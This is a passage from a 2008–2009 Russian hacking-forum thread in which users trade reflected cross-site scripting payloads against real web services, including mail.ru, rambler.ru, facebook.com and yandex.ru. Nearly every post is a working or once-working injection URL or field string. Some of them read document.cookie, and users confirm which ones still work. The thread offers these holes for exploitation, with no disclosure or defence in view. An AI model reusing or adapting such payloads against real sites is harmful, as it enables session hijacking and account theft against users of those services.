Форум АНТИЧАТ
Страница 2 из 15 < 1 2 3 4 5 6 12 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Пассивные xss на почтовых серверах (https://forum.antichat.xyz/showthread.php?t=88986)

Luccifer 25.11.2008 16:59
Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phras e=&proto=1&url=%22%3E%3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cper son=&email=&phone=&fax=&address=&keywords=&session _id=16073130&category_id=10993&category_name=%CC%E 5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&p age=1&save=1

http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Lu ccifer')%3C%2Fscript%3E&password=


http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealer t('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4


http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470


http://hosting.mail.ru/
в поле логин вводим
Код:
"><script>alert('xss')</script>

ImpLex 14.12.2008 17:56
http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000 000000000000000000003&pubMode=%3Cscript%3Ealert()% 3C/script%3E
Была активная XSS, но топик для пассивных.

S0ulVortex 19.12.2008 22:20
Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5& form=0&hu=1&what=0

</title><script>alert('S0ulVortex')</script>

Jazz 26.12.2008 11:24
http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470

уже не работают?или я не то делаю?

faza02 26.12.2008 11:31
не работают.
Код:
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E
эта работает.

The matrix 31.12.2008 21:21
Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
Цитата:
http://miss.rambler.ru/srch/?sort=0&set=miss&words=%22%3E%3Cscript%3Ealert(/hacker?/)%3C/script%3E

iddqd 04.01.2009 15:37
Gala.net
Код:
http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and

iddqd 04.01.2009 18:14
ВШтате
Код:
http://vshtate.ru/reg?op=message&email=[XSS]
Но если авторизован, то не пашет :(
Короче, бесполезная :(
В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
Непохек :(

baltazar 05.01.2009 16:05
Facebook.com




Код:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E

только толку от нее нету:(

lmns 10.01.2009 22:33
http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lm ns")</script>


Время: 00:08
Страница 2 из 15 < 1 2 3 4 5 6 12 > Последняя »
Показывать 40 сообщений этой темы на одной странице